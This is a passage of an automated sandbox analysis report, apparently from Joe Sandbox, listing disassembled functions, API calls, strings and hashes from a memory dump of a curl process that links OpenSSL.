                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: ','$..\..\openssl\openssl\crypto\bio\bss_file.c$..\..\openssl\openssl\crypto\bio\bss_file.c$..\..\openssl\openssl\crypto\bio\bss_file.c$fopen('$p~3$t~3$x~3$|~3
                                                                                                                                                                    • API String ID: 1452528299-1546687134
                                                                                                                                                                    • Opcode ID: 559400d29ac7fa2530307f2bcbc9e4c24412835c84d42cb43f67993e21edbb09
                                                                                                                                                                    • Instruction ID: 2be53abf6079d43a3f3e1b3b51fd99058721166ca523f8f2998164ccf76b316f
                                                                                                                                                                    • Opcode Fuzzy Hash: 559400d29ac7fa2530307f2bcbc9e4c24412835c84d42cb43f67993e21edbb09
                                                                                                                                                                    • Instruction Fuzzy Hash: F8819DB36282418BD729DE289C81BE7B7D4EF85311F4845A9FD859B241C73BDC2C87A1
                                                                                                                                                                    Function 002D88BB Relevance: 15.3, APIs: 10, Instructions: 274COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: 5fedd5572b1fae189e9df952b5719034791700e9400cf52ce2b5213391200905
                                                                                                                                                                    • Instruction ID: 63d12458522d1774d34ff191f14a6cda52c6c610dc0900627ce6b28baae965c2
                                                                                                                                                                    • Opcode Fuzzy Hash: 5fedd5572b1fae189e9df952b5719034791700e9400cf52ce2b5213391200905
                                                                                                                                                                    • Instruction Fuzzy Hash: 92B14DB1D20616AECB20DFA9C844AEDB7F8BF08710F14421BF555E7691EB74D860CBA1
                                                                                                                                                                    Function 002C3DEF Relevance: 15.2, APIs: 10, Instructions: 166COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetConsoleCtrlHandler.KERNEL32(002C3B55,00000001,00307BC0,00000014,0029FBDC,00000016,0029FCA0,0029F9A2,?), ref: 002C3F15
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 002C3F2E
                                                                                                                                                                    • DecodePointer.KERNEL32(00307BC0,00000014,0029FBDC,00000016,0029FCA0,0029F9A2,?), ref: 002C3F67
                                                                                                                                                                    • EncodePointer.KERNEL32(?), ref: 002C3F78
                                                                                                                                                                    • DecodePointer.KERNEL32(00307BC0,00000014,0029FBDC,00000016,0029FCA0,0029F9A2,?), ref: 002C3F8B
                                                                                                                                                                    • EncodePointer.KERNEL32(?), ref: 002C3F9C
                                                                                                                                                                    • DecodePointer.KERNEL32(00307BC0,00000014,0029FBDC,00000016,0029FCA0,0029F9A2,?), ref: 002C3FAF
                                                                                                                                                                    • EncodePointer.KERNEL32(?), ref: 002C3FC0
                                                                                                                                                                    • DecodePointer.KERNEL32(00307BC0,00000014,0029FBDC,00000016,0029FCA0,0029F9A2,?), ref: 002C3FD3
                                                                                                                                                                    • EncodePointer.KERNEL32(?), ref: 002C3FE4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Pointer$DecodeEncode$ConsoleCtrlErrorHandlerLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 79376508-0
                                                                                                                                                                    • Opcode ID: 4888dbaae424266db0fd2b7ec0c8914ceed3dcc96a86848e6913acff6c22914b
                                                                                                                                                                    • Instruction ID: 57331012190dd9d64be63553cda3a37cce54b3bf829e3f09411530c3ca255d4e
                                                                                                                                                                    • Opcode Fuzzy Hash: 4888dbaae424266db0fd2b7ec0c8914ceed3dcc96a86848e6913acff6c22914b
                                                                                                                                                                    • Instruction Fuzzy Hash: D051A031D246428BCB35DF28D849F6D7BB2AB44315F06CB1EE40A97661D3758EA0CF61
                                                                                                                                                                    Function 001EEE80 Relevance: 14.4, APIs: 3, Strings: 5, Instructions: 417COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001EEECA
                                                                                                                                                                    • GetTickCount64.KERNEL32 ref: 001EEF0E
                                                                                                                                                                      • Part of subcall function 001EEBB0: GetTickCount64.KERNEL32 ref: 001EEBF2
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: Accept-ranges: bytes$Can't get the size of file.$Content-Length: %lld$Last-Modified: %s, %02d %s %4d %02d:%02d:%02d GMT$failed to resume file:// transfer
                                                                                                                                                                    • API String ID: 1927824332-1432456729
                                                                                                                                                                    • Opcode ID: a4e5586f75cac5b5a866b6c2b389c55696c530f5cf0de675ed10ce8c810bb6b2
                                                                                                                                                                    • Instruction ID: f8283ba3a9f25d58248f77604e6448940fd557e652e69eac82d0a1cd06727302
                                                                                                                                                                    • Opcode Fuzzy Hash: a4e5586f75cac5b5a866b6c2b389c55696c530f5cf0de675ed10ce8c810bb6b2
                                                                                                                                                                    • Instruction Fuzzy Hash: 5BE1E531B04B829BCB18DF29D881BAEB7E5BF95304F00462DF98D97281DB319915CB92
                                                                                                                                                                    Function 00205540 Relevance: 14.2, APIs: 6, Strings: 2, Instructions: 203networkCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • htons.WS2_32(?), ref: 0020604E
                                                                                                                                                                    • htons.WS2_32(?), ref: 0020605F
                                                                                                                                                                    • send.WS2_32(?,?,00000003,00000000), ref: 002060DF
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?), ref: 002060EF
                                                                                                                                                                    • send.WS2_32(?,?,00000002,00000000), ref: 00206123
                                                                                                                                                                    • WSAGetLastError.WS2_32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0020612D
                                                                                                                                                                    Strings
                                                                                                                                                                    • Sending data failed (%d), xrefs: 002060F2
                                                                                                                                                                    • Sending data failed (%d), xrefs: 00206130
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLasthtonssend
                                                                                                                                                                    • String ID: Sending data failed (%d)$Sending data failed (%d)
                                                                                                                                                                    • API String ID: 2027122571-2562922721
                                                                                                                                                                    • Opcode ID: e7b2d3ad62765e109807aa1c8a542218b133e3a52d274e199bda747a9a295b4b
                                                                                                                                                                    • Instruction ID: ecd1290810f4fd0fde30f7337b144e8783a72a109bc5abadd4130caf0954958c
                                                                                                                                                                    • Opcode Fuzzy Hash: e7b2d3ad62765e109807aa1c8a542218b133e3a52d274e199bda747a9a295b4b
                                                                                                                                                                    • Instruction Fuzzy Hash: 9E614575210A22EFD7018F28D889BA67BA9FB54315F640121E906CB3C7D771E875CBA1
                                                                                                                                                                    Function 00254D50 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 145threadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 00254E0C
                                                                                                                                                                    Strings
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rsa\rsa_eay.c, xrefs: 00254D93
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rsa\rsa_eay.c, xrefs: 00254D72
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rsa\rsa_eay.c, xrefs: 00254EE1
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rsa\rsa_eay.c, xrefs: 00254EC1
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rsa\rsa_eay.c, xrefs: 00254E81
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rsa\rsa_eay.c, xrefs: 00254DAF
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rsa\rsa_eay.c, xrefs: 00254E65
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CurrentThread
                                                                                                                                                                    • String ID: ..\..\openssl\openssl\crypto\rsa\rsa_eay.c$..\..\openssl\openssl\crypto\rsa\rsa_eay.c$..\..\openssl\openssl\crypto\rsa\rsa_eay.c$..\..\openssl\openssl\crypto\rsa\rsa_eay.c$..\..\openssl\openssl\crypto\rsa\rsa_eay.c$..\..\openssl\openssl\crypto\rsa\rsa_eay.c$..\..\openssl\openssl\crypto\rsa\rsa_eay.c
                                                                                                                                                                    • API String ID: 2882836952-2396807625
                                                                                                                                                                    • Opcode ID: 9cbc09fa655ce4d05679376dc052771256ca2dfbf02c861e0ebd2e7417c7cba5
                                                                                                                                                                    • Instruction ID: 00024ebf250fe44e6369df8317eb5c599e9058f637aa251cabec96b5ee1cd6f4
                                                                                                                                                                    • Opcode Fuzzy Hash: 9cbc09fa655ce4d05679376dc052771256ca2dfbf02c861e0ebd2e7417c7cba5
                                                                                                                                                                    • Instruction Fuzzy Hash: B141A6347503015BE711EF58CC42B56B3E4BB44B19F044519EE58DB3C2E7F1EDA886A5
                                                                                                                                                                    Function 002CB574 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 140fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,00367972,00000104,?,00000001,00000000), ref: 002CB606
                                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000001,00000000), ref: 002CB6C0
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,00000001,00000000), ref: 002CB70F
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$HandleModuleNameWrite
                                                                                                                                                                    • String ID: ...$<program name unknown>$@y6$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                                                                                                                                                    • API String ID: 3784150691-2335345847
                                                                                                                                                                    • Opcode ID: 21808815499b5eb65f2fb0e827c22c67ac02d6baac2f3d08d8dc0aeb3f099e8c
                                                                                                                                                                    • Instruction ID: 489b2a19cc8755e87e19d41f8c8e2a70176808eca994e1019af2defe14002bcf
                                                                                                                                                                    • Opcode Fuzzy Hash: 21808815499b5eb65f2fb0e827c22c67ac02d6baac2f3d08d8dc0aeb3f099e8c
                                                                                                                                                                    • Instruction Fuzzy Hash: FF412532EB071666D7226A789C87FFA62AC9B05758F51423EFD04A22C2FB60CD3445A1
                                                                                                                                                                    Function 001E51D0 Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 265COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • SSL connection timeout, xrefs: 001E54B7
                                                                                                                                                                    • SSL connection timeout, xrefs: 001E54E3
                                                                                                                                                                    • SSL connection timeout, xrefs: 001E533C
                                                                                                                                                                    • select/poll on SSL socket, errno: %d, xrefs: 001E54C9
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309297034.00000000002DD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309353805.0000000000309000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309384926.000000000030B000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309419651.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309448745.0000000000311000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309483305.000000000031B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309519624.000000000031C000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309551058.000000000031D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309581446.000000000031F000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309612880.0000000000321000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309645029.0000000000322000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309679043.0000000000323000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309716539.0000000000324000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309793088.0000000000367000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    • Associated: 00000022.00000002.20309827793.000000000036C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_34_2_1c0000_curl.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Count64Tick
                                                                                                                                                                    • String ID: SSL connection timeout$SSL connection timeout$SSL connection timeout$select/poll on SSL socket, errno: %d
                                                                                                                                                                    • API String ID: 1927824332-2205507416
                                                                                                                                                                    • Opcode ID: de87a52872faeda3804e0139a82d6ff0374a1d3d870307eb4f9bb6699d0133a0
                                                                                                                                                                    • Instruction ID: 4719bf5a2f521362b27cec2bc4f5b140396a81a924b6ec662184e14726d1377e
                                                                                                                                                                    • Opcode Fuzzy Hash: de87a52872faeda3804e0139a82d6ff0374a1d3d870307eb4f9bb6699d0133a0
                                                                                                                                                                    • Instruction Fuzzy Hash: 5591F731704F818BC728CE2A998566EB7D6EBC9319F18463EE90A9B281DB70DD44C791
                                                                                                                                                                    Function 00236C30 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 116COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236CEA
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236D07
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236D36
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236D9A
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236CC5
                                                                                                                                                                    • ..\..\openssl\openssl\crypto\rand\md_rand.c, xrefs: 00236C88
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000022.00000002.20309070776.00000000001C1000.00000020.00000001.01000000.00000006.sdmp, Offset: 001C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000022.00000002.20309033901.00000000001C0000.00000002.00000001.01000000.00000006.sdmpDownload File
